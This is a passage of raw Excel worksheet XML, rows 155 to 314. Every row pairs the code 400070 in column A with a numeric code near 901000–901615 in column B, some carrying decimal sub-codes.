      </c>
      <c r="B155" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="156" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A156" s="6">
        <v>400070</v>
      </c>
      <c r="B156" s="3">
        <v>901059.00600000005</v>
      </c>
    </row>
    <row r="157" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A157" s="6">
        <v>400070</v>
      </c>
      <c r="B157" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="158" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A158" s="6">
        <v>400070</v>
      </c>
      <c r="B158" s="3">
        <v>901059.00800000003</v>
      </c>
    </row>
    <row r="159" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A159" s="6">
        <v>400070</v>
      </c>
      <c r="B159" s="3">
        <v>901136</v>
      </c>
    </row>
    <row r="160" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A160" s="6">
        <v>400070</v>
      </c>
      <c r="B160" s="3">
        <v>901136.00100000005</v>
      </c>
    </row>
    <row r="161" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A161" s="6">
        <v>400070</v>
      </c>
      <c r="B161" s="3">
        <v>901136.00199999998</v>
      </c>
    </row>
    <row r="162" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A162" s="6">
        <v>400070</v>
      </c>
      <c r="B162" s="3">
        <v>901543</v>
      </c>
    </row>
    <row r="163" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A163" s="6">
        <v>400070</v>
      </c>
      <c r="B163" s="3">
        <v>901543.00100000005</v>
      </c>
    </row>
    <row r="164" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A164" s="6">
        <v>400070</v>
      </c>
      <c r="B164" s="3">
        <v>901543.00199999998</v>
      </c>
    </row>
    <row r="165" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A165" s="6">
        <v>400070</v>
      </c>
      <c r="B165" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="166" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A166" s="6">
        <v>400070</v>
      </c>
      <c r="B166" s="3">
        <v>901543.00399999996</v>
      </c>
    </row>
    <row r="167" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A167" s="6">
        <v>400070</v>
      </c>
      <c r="B167" s="3">
        <v>901458</v>
      </c>
    </row>
    <row r="168" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A168" s="6">
        <v>400070</v>
      </c>
      <c r="B168" s="3">
        <v>901486</v>
      </c>
    </row>
    <row r="169" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A169" s="6">
        <v>400070</v>
      </c>
      <c r="B169" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="170" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A170" s="6">
        <v>400070</v>
      </c>
      <c r="B170" s="3">
        <v>901039</v>
      </c>
    </row>
    <row r="171" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A171" s="6">
        <v>400070</v>
      </c>
      <c r="B171" s="3">
        <v>901025</v>
      </c>
    </row>
    <row r="172" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A172" s="6">
        <v>400070</v>
      </c>
      <c r="B172" s="3">
        <v>901074</v>
      </c>
    </row>
    <row r="173" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A173" s="6">
        <v>400070</v>
      </c>
      <c r="B173" s="3">
        <v>901074.00100000005</v>
      </c>
    </row>
    <row r="174" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A174" s="6">
        <v>400070</v>
      </c>
      <c r="B174" s="3">
        <v>901074.00199999998</v>
      </c>
    </row>
    <row r="175" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A175" s="6">
        <v>400070</v>
      </c>
      <c r="B175" s="3">
        <v>901006</v>
      </c>
    </row>
    <row r="176" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A176" s="6">
        <v>400070</v>
      </c>
      <c r="B176" s="3">
        <v>901561</v>
      </c>
    </row>
    <row r="177" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A177" s="6">
        <v>400070</v>
      </c>
      <c r="B177" s="3">
        <v>901561.00100000005</v>
      </c>
    </row>
    <row r="178" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A178" s="6">
        <v>400070</v>
      </c>
      <c r="B178" s="3">
        <v>901561.00199999998</v>
      </c>
    </row>
    <row r="179" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A179" s="6">
        <v>400070</v>
      </c>
      <c r="B179" s="3">
        <v>901484</v>
      </c>
    </row>
    <row r="180" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A180" s="6">
        <v>400070</v>
      </c>
      <c r="B180" s="3">
        <v>901484.00100000005</v>
      </c>
    </row>
    <row r="181" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A181" s="6">
        <v>400070</v>
      </c>
      <c r="B181" s="3">
        <v>901484.00199999998</v>
      </c>
    </row>
    <row r="182" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A182" s="6">
        <v>400070</v>
      </c>
      <c r="B182" s="3">
        <v>901114</v>
      </c>
    </row>
    <row r="183" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A183" s="6">
        <v>400070</v>
      </c>
      <c r="B183" s="3">
        <v>901114.00100000005</v>
      </c>
    </row>
    <row r="184" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A184" s="6">
        <v>400070</v>
      </c>
      <c r="B184" s="3">
        <v>901114.00199999998</v>
      </c>
    </row>
    <row r="185" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A185" s="6">
        <v>400070</v>
      </c>
      <c r="B185" s="3">
        <v>901546</v>
      </c>
    </row>
    <row r="186" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A186" s="6">
        <v>400070</v>
      </c>
      <c r="B186" s="3">
        <v>901546.00100000005</v>
      </c>
    </row>
    <row r="187" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A187" s="6">
        <v>400070</v>
      </c>
      <c r="B187" s="3">
        <v>901546.00199999998</v>
      </c>
    </row>
    <row r="188" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A188" s="6">
        <v>400070</v>
      </c>
      <c r="B188" s="3">
        <v>901546.00300000003</v>
      </c>
    </row>
    <row r="189" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A189" s="6">
        <v>400070</v>
      </c>
      <c r="B189" s="3">
        <v>901546.00399999996</v>
      </c>
    </row>
    <row r="190" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A190" s="6">
        <v>400070</v>
      </c>
      <c r="B190" s="3">
        <v>901546.005</v>
      </c>
    </row>
    <row r="191" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A191" s="6">
        <v>400070</v>
      </c>
      <c r="B191" s="3">
        <v>901546.00600000005</v>
      </c>
    </row>
    <row r="192" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A192" s="6">
        <v>400070</v>
      </c>
      <c r="B192" s="3">
        <v>901546.00699999998</v>
      </c>
    </row>
    <row r="193" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A193" s="6">
        <v>400070</v>
      </c>
      <c r="B193" s="3">
        <v>901546.00800000003</v>
      </c>
    </row>
    <row r="194" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A194" s="6">
        <v>400070</v>
      </c>
      <c r="B194" s="3">
        <v>901546.00899999996</v>
      </c>
    </row>
    <row r="195" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A195" s="6">
        <v>400070</v>
      </c>
      <c r="B195" s="3">
        <v>901546.01</v>
      </c>
    </row>
    <row r="196" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A196" s="6">
        <v>400070</v>
      </c>
      <c r="B196" s="3">
        <v>901546.01100000006</v>
      </c>
    </row>
    <row r="197" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A197" s="6">
        <v>400070</v>
      </c>
      <c r="B197" s="3">
        <v>901546.01199999999</v>
      </c>
    </row>
    <row r="198" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A198" s="6">
        <v>400070</v>
      </c>
      <c r="B198" s="3">
        <v>901546.01300000004</v>
      </c>
    </row>
    <row r="199" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A199" s="6">
        <v>400070</v>
      </c>
      <c r="B199" s="3">
        <v>901546.01399999997</v>
      </c>
    </row>
    <row r="200" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A200" s="6">
        <v>400070</v>
      </c>
      <c r="B200" s="3">
        <v>901546.01500000001</v>
      </c>
    </row>
    <row r="201" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A201" s="6">
        <v>400070</v>
      </c>
      <c r="B201" s="3">
        <v>901480</v>
      </c>
    </row>
    <row r="202" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A202" s="6">
        <v>400070</v>
      </c>
      <c r="B202" s="3">
        <v>901480.00100000005</v>
      </c>
    </row>
    <row r="203" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A203" s="6">
        <v>400070</v>
      </c>
      <c r="B203" s="3">
        <v>901048</v>
      </c>
    </row>
    <row r="204" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A204" s="6">
        <v>400070</v>
      </c>
      <c r="B204" s="3">
        <v>901048.00100000005</v>
      </c>
    </row>
    <row r="205" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A205" s="6">
        <v>400070</v>
      </c>
      <c r="B205" s="3">
        <v>901048.00199999998</v>
      </c>
    </row>
    <row r="206" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A206" s="6">
        <v>400070</v>
      </c>
      <c r="B206" s="3">
        <v>901048.00300000003</v>
      </c>
    </row>
    <row r="207" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A207" s="6">
        <v>400070</v>
      </c>
      <c r="B207" s="3">
        <v>901041</v>
      </c>
    </row>
    <row r="208" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A208" s="6">
        <v>400070</v>
      </c>
      <c r="B208" s="3">
        <v>901011</v>
      </c>
    </row>
    <row r="209" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A209" s="6">
        <v>400070</v>
      </c>
      <c r="B209" s="3">
        <v>901011.00100000005</v>
      </c>
    </row>
    <row r="210" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A210" s="6">
        <v>400070</v>
      </c>
      <c r="B210" s="3">
        <v>901052</v>
      </c>
    </row>
    <row r="211" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A211" s="6">
        <v>400070</v>
      </c>
      <c r="B211" s="3">
        <v>901052.00100000005</v>
      </c>
    </row>
    <row r="212" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A212" s="6">
        <v>400070</v>
      </c>
      <c r="B212" s="3">
        <v>901567</v>
      </c>
    </row>
    <row r="213" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A213" s="6">
        <v>400070</v>
      </c>
      <c r="B213" s="3">
        <v>901567.00100000005</v>
      </c>
    </row>
    <row r="214" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A214" s="6">
        <v>400070</v>
      </c>
      <c r="B214" s="3">
        <v>901567.00199999998</v>
      </c>
    </row>
    <row r="215" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A215" s="6">
        <v>400070</v>
      </c>
      <c r="B215" s="3">
        <v>901083</v>
      </c>
    </row>
    <row r="216" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A216" s="6">
        <v>400070</v>
      </c>
      <c r="B216" s="3">
        <v>901222</v>
      </c>
    </row>
    <row r="217" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A217" s="6">
        <v>400070</v>
      </c>
      <c r="B217" s="3">
        <v>901222.00100000005</v>
      </c>
    </row>
    <row r="218" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A218" s="6">
        <v>400070</v>
      </c>
      <c r="B218" s="3">
        <v>901222.00199999998</v>
      </c>
    </row>
    <row r="219" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A219" s="6">
        <v>400070</v>
      </c>
      <c r="B219" s="3">
        <v>901615</v>
      </c>
    </row>
    <row r="220" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A220" s="6">
        <v>400070</v>
      </c>
      <c r="B220" s="3">
        <v>901564</v>
      </c>
    </row>
    <row r="221" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A221" s="6">
        <v>400070</v>
      </c>
      <c r="B221" s="3">
        <v>901564.00100000005</v>
      </c>
    </row>
    <row r="222" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A222" s="6">
        <v>400070</v>
      </c>
      <c r="B222" s="3">
        <v>901564.00199999998</v>
      </c>
    </row>
    <row r="223" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A223" s="6">
        <v>400070</v>
      </c>
      <c r="B223" s="3">
        <v>901564.00300000003</v>
      </c>
    </row>
    <row r="224" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A224" s="6">
        <v>400070</v>
      </c>
      <c r="B224" s="3">
        <v>901564.00399999996</v>
      </c>
    </row>
    <row r="225" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A225" s="6">
        <v>400070</v>
      </c>
      <c r="B225" s="3">
        <v>901564.00600000005</v>
      </c>
    </row>
    <row r="226" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A226" s="6">
        <v>400070</v>
      </c>
      <c r="B226" s="3">
        <v>901564.00800000003</v>
      </c>
    </row>
    <row r="227" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A227" s="6">
        <v>400070</v>
      </c>
      <c r="B227" s="3">
        <v>901564.00899999996</v>
      </c>
    </row>
    <row r="228" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A228" s="6">
        <v>400070</v>
      </c>
      <c r="B228" s="3">
        <v>901574</v>
      </c>
    </row>
    <row r="229" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A229" s="6">
        <v>400070</v>
      </c>
      <c r="B229" s="3">
        <v>901574.00600000005</v>
      </c>
    </row>
    <row r="230" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A230" s="6">
        <v>400070</v>
      </c>
      <c r="B230" s="3">
        <v>901574.01100000006</v>
      </c>
    </row>
    <row r="231" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A231" s="6">
        <v>400070</v>
      </c>
      <c r="B231" s="3">
        <v>901574.01199999999</v>
      </c>
    </row>
    <row r="232" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A232" s="6">
        <v>400070</v>
      </c>
      <c r="B232" s="3">
        <v>901562</v>
      </c>
    </row>
    <row r="233" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A233" s="6">
        <v>400070</v>
      </c>
      <c r="B233" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="234" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A234" s="6">
        <v>400070</v>
      </c>
      <c r="B234" s="3">
        <v>901562.00199999998</v>
      </c>
    </row>
    <row r="235" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A235" s="6">
        <v>400070</v>
      </c>
      <c r="B235" s="3">
        <v>901562.00300000003</v>
      </c>
    </row>
    <row r="236" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A236" s="6">
        <v>400070</v>
      </c>
      <c r="B236" s="3">
        <v>901562.00399999996</v>
      </c>
    </row>
    <row r="237" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A237" s="6">
        <v>400070</v>
      </c>
      <c r="B237" s="3">
        <v>901562.00600000005</v>
      </c>
    </row>
    <row r="238" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A238" s="6">
        <v>400070</v>
      </c>
      <c r="B238" s="3">
        <v>901562.00899999996</v>
      </c>
    </row>
    <row r="239" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A239" s="6">
        <v>400070</v>
      </c>
      <c r="B239" s="3">
        <v>901562.01</v>
      </c>
    </row>
    <row r="240" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A240" s="6">
        <v>400070</v>
      </c>
      <c r="B240" s="3">
        <v>901070</v>
      </c>
    </row>
    <row r="241" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A241" s="6">
        <v>400070</v>
      </c>
      <c r="B241" s="3">
        <v>901070.00100000005</v>
      </c>
    </row>
    <row r="242" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A242" s="6">
        <v>400070</v>
      </c>
      <c r="B242" s="3">
        <v>901070.00199999998</v>
      </c>
    </row>
    <row r="243" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A243" s="6">
        <v>400070</v>
      </c>
      <c r="B243" s="3">
        <v>901070.00300000003</v>
      </c>
    </row>
    <row r="244" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A244" s="6">
        <v>400070</v>
      </c>
      <c r="B244" s="3">
        <v>901070.00399999996</v>
      </c>
    </row>
    <row r="245" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A245" s="6">
        <v>400070</v>
      </c>
      <c r="B245" s="3">
        <v>901070.005</v>
      </c>
    </row>
    <row r="246" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A246" s="6">
        <v>400070</v>
      </c>
      <c r="B246" s="3">
        <v>901202</v>
      </c>
    </row>
    <row r="247" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A247" s="6">
        <v>400070</v>
      </c>
      <c r="B247" s="3">
        <v>901490</v>
      </c>
    </row>
    <row r="248" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A248" s="6">
        <v>400070</v>
      </c>
      <c r="B248" s="3">
        <v>901056.00199999998</v>
      </c>
    </row>
    <row r="249" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A249" s="6">
        <v>400070</v>
      </c>
      <c r="B249" s="3">
        <v>901570</v>
      </c>
    </row>
    <row r="250" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A250" s="6">
        <v>400070</v>
      </c>
      <c r="B250" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="251" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A251" s="6">
        <v>400070</v>
      </c>
      <c r="B251" s="3">
        <v>901036.00300000003</v>
      </c>
    </row>
    <row r="252" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A252" s="6">
        <v>400070</v>
      </c>
      <c r="B252" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="253" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A253" s="6">
        <v>400070</v>
      </c>
      <c r="B253" s="3">
        <v>901112</v>
      </c>
    </row>
    <row r="254" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A254" s="6">
        <v>400070</v>
      </c>
      <c r="B254" s="3">
        <v>901046</v>
      </c>
    </row>
    <row r="255" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A255" s="6">
        <v>400070</v>
      </c>
      <c r="B255" s="3">
        <v>901135</v>
      </c>
    </row>
    <row r="256" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A256" s="6">
        <v>400070</v>
      </c>
      <c r="B256" s="3">
        <v>901040</v>
      </c>
    </row>
    <row r="257" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A257" s="6">
        <v>400070</v>
      </c>
      <c r="B257" s="3">
        <v>901027</v>
      </c>
    </row>
    <row r="258" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A258" s="6">
        <v>400070</v>
      </c>
      <c r="B258" s="3">
        <v>901027.00399999996</v>
      </c>
    </row>
    <row r="259" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A259" s="6">
        <v>400070</v>
      </c>
      <c r="B259" s="3">
        <v>901137</v>
      </c>
    </row>
    <row r="260" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A260" s="6">
        <v>400070</v>
      </c>
      <c r="B260" s="3">
        <v>901137.00100000005</v>
      </c>
    </row>
    <row r="261" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A261" s="6">
        <v>400070</v>
      </c>
      <c r="B261" s="3">
        <v>901137.00199999998</v>
      </c>
    </row>
    <row r="262" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A262" s="6">
        <v>400070</v>
      </c>
      <c r="B262" s="3">
        <v>901137.00300000003</v>
      </c>
    </row>
    <row r="263" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A263" s="6">
        <v>400070</v>
      </c>
      <c r="B263" s="3">
        <v>901137.00399999996</v>
      </c>
    </row>
    <row r="264" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A264" s="6">
        <v>400070</v>
      </c>
      <c r="B264" s="3">
        <v>901137.005</v>
      </c>
    </row>
    <row r="265" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A265" s="6">
        <v>400070</v>
      </c>
      <c r="B265" s="3">
        <v>901137.00600000005</v>
      </c>
    </row>
    <row r="266" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A266" s="6">
        <v>400070</v>
      </c>
      <c r="B266" s="3">
        <v>901003</v>
      </c>
    </row>
    <row r="267" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A267" s="6">
        <v>400070</v>
      </c>
      <c r="B267" s="3">
        <v>901003.00100000005</v>
      </c>
    </row>
    <row r="268" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A268" s="6">
        <v>400070</v>
      </c>
      <c r="B268" s="3">
        <v>901003.00199999998</v>
      </c>
    </row>
    <row r="269" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A269" s="6">
        <v>400070</v>
      </c>
      <c r="B269" s="3">
        <v>901003.00300000003</v>
      </c>
    </row>
    <row r="270" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A270" s="6">
        <v>400070</v>
      </c>
      <c r="B270" s="3">
        <v>901003.00399999996</v>
      </c>
    </row>
    <row r="271" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A271" s="6">
        <v>400070</v>
      </c>
      <c r="B271" s="3">
        <v>901003.005</v>
      </c>
    </row>
    <row r="272" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A272" s="6">
        <v>400070</v>
      </c>
      <c r="B272" s="3">
        <v>901003.00699999998</v>
      </c>
    </row>
    <row r="273" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A273" s="6">
        <v>400070</v>
      </c>
      <c r="B273" s="3">
        <v>901003.00800000003</v>
      </c>
    </row>
    <row r="274" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A274" s="6">
        <v>400070</v>
      </c>
      <c r="B274" s="3">
        <v>901201</v>
      </c>
    </row>
    <row r="275" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A275" s="6">
        <v>400070</v>
      </c>
      <c r="B275" s="3">
        <v>901120</v>
      </c>
    </row>
    <row r="276" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A276" s="6">
        <v>400070</v>
      </c>
      <c r="B276" s="3">
        <v>901069</v>
      </c>
    </row>
    <row r="277" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A277" s="6">
        <v>400070</v>
      </c>
      <c r="B277" s="3">
        <v>901069.00100000005</v>
      </c>
    </row>
    <row r="278" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A278" s="6">
        <v>400070</v>
      </c>
      <c r="B278" s="3">
        <v>901069.00199999998</v>
      </c>
    </row>
    <row r="279" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A279" s="6">
        <v>400070</v>
      </c>
      <c r="B279" s="3">
        <v>901069.00300000003</v>
      </c>
    </row>
    <row r="280" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A280" s="6">
        <v>400070</v>
      </c>
      <c r="B280" s="3">
        <v>901542</v>
      </c>
    </row>
    <row r="281" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A281" s="6">
        <v>400070</v>
      </c>
      <c r="B281" s="3">
        <v>901542.005</v>
      </c>
    </row>
    <row r="282" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A282" s="6">
        <v>400070</v>
      </c>
      <c r="B282" s="3">
        <v>901057</v>
      </c>
    </row>
    <row r="283" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A283" s="6">
        <v>400070</v>
      </c>
      <c r="B283" s="3">
        <v>901012</v>
      </c>
    </row>
    <row r="284" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A284" s="6">
        <v>400070</v>
      </c>
      <c r="B284" s="3">
        <v>901563</v>
      </c>
    </row>
    <row r="285" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A285" s="6">
        <v>400070</v>
      </c>
      <c r="B285" s="3">
        <v>901563.00100000005</v>
      </c>
    </row>
    <row r="286" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A286" s="6">
        <v>400070</v>
      </c>
      <c r="B286" s="3">
        <v>901563.00199999998</v>
      </c>
    </row>
    <row r="287" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A287" s="6">
        <v>400070</v>
      </c>
      <c r="B287" s="3">
        <v>901021</v>
      </c>
    </row>
    <row r="288" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A288" s="6">
        <v>400070</v>
      </c>
      <c r="B288" s="3">
        <v>901021.00199999998</v>
      </c>
    </row>
    <row r="289" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A289" s="6">
        <v>400070</v>
      </c>
      <c r="B289" s="3">
        <v>901021.00600000005</v>
      </c>
    </row>
    <row r="290" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A290" s="6">
        <v>400070</v>
      </c>
      <c r="B290" s="3">
        <v>901018</v>
      </c>
    </row>
    <row r="291" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A291" s="6">
        <v>400070</v>
      </c>
      <c r="B291" s="3">
        <v>901496</v>
      </c>
    </row>
    <row r="292" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A292" s="6">
        <v>400070</v>
      </c>
      <c r="B292" s="3">
        <v>901053</v>
      </c>
    </row>
    <row r="293" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A293" s="6">
        <v>400070</v>
      </c>
      <c r="B293" s="3">
        <v>901053.00100000005</v>
      </c>
    </row>
    <row r="294" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A294" s="6">
        <v>400070</v>
      </c>
      <c r="B294" s="3">
        <v>901053.00199999998</v>
      </c>
    </row>
    <row r="295" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A295" s="6">
        <v>400070</v>
      </c>
      <c r="B295" s="3">
        <v>901053.00300000003</v>
      </c>
    </row>
    <row r="296" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A296" s="6">
        <v>400070</v>
      </c>
      <c r="B296" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="297" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A297" s="6">
        <v>400070</v>
      </c>
      <c r="B297" s="3">
        <v>901053.00600000005</v>
      </c>
    </row>
    <row r="298" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A298" s="6">
        <v>400070</v>
      </c>
      <c r="B298" s="3">
        <v>901113</v>
      </c>
    </row>
    <row r="299" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A299" s="6">
        <v>400070</v>
      </c>
      <c r="B299" s="3">
        <v>901505.00399999996</v>
      </c>
    </row>
    <row r="300" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A300" s="6">
        <v>400070</v>
      </c>
      <c r="B300" s="3">
        <v>901489</v>
      </c>
    </row>
    <row r="301" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A301" s="6">
        <v>400070</v>
      </c>
      <c r="B301" s="3">
        <v>901216</v>
      </c>
    </row>
    <row r="302" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A302" s="6">
        <v>400070</v>
      </c>
      <c r="B302" s="3">
        <v>901216.00100000005</v>
      </c>
    </row>
    <row r="303" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A303" s="6">
        <v>400070</v>
      </c>
      <c r="B303" s="3">
        <v>901518</v>
      </c>
    </row>
    <row r="304" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A304" s="6">
        <v>400070</v>
      </c>
      <c r="B304" s="3">
        <v>901518.00100000005</v>
      </c>
    </row>
    <row r="305" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A305" s="6">
        <v>400070</v>
      </c>
      <c r="B305" s="3">
        <v>901558</v>
      </c>
    </row>
    <row r="306" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A306" s="6">
        <v>400070</v>
      </c>
      <c r="B306" s="3">
        <v>901553</v>
      </c>
    </row>
    <row r="307" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A307" s="6">
        <v>400070</v>
      </c>
      <c r="B307" s="3">
        <v>901553.00100000005</v>
      </c>
    </row>
    <row r="308" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A308" s="6">
        <v>400070</v>
      </c>
      <c r="B308" s="3">
        <v>901553.00399999996</v>
      </c>
    </row>
    <row r="309" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A309" s="6">
        <v>400070</v>
      </c>
      <c r="B309" s="3">
        <v>901553.00600000005</v>
      </c>
    </row>
    <row r="310" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A310" s="6">
        <v>400070</v>
      </c>
      <c r="B310" s="3">
        <v>901082</v>
      </c>
    </row>
    <row r="311" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A311" s="6">
        <v>400070</v>
      </c>
      <c r="B311" s="3">
        <v>901614</v>
      </c>
    </row>
    <row r="312" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A312" s="6">
        <v>400070</v>
      </c>
      <c r="B312" s="3">
        <v>901614.00100000005</v>
      </c>
    </row>
    <row r="313" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A313" s="6">
        <v>400070</v>
      </c>
      <c r="B313" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="314" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A314" s="6">
        <v>400070</v>
      </c>
      <c r="B314" s="3">
        <v>901016.00100000005</v>
      </c>
    </row>
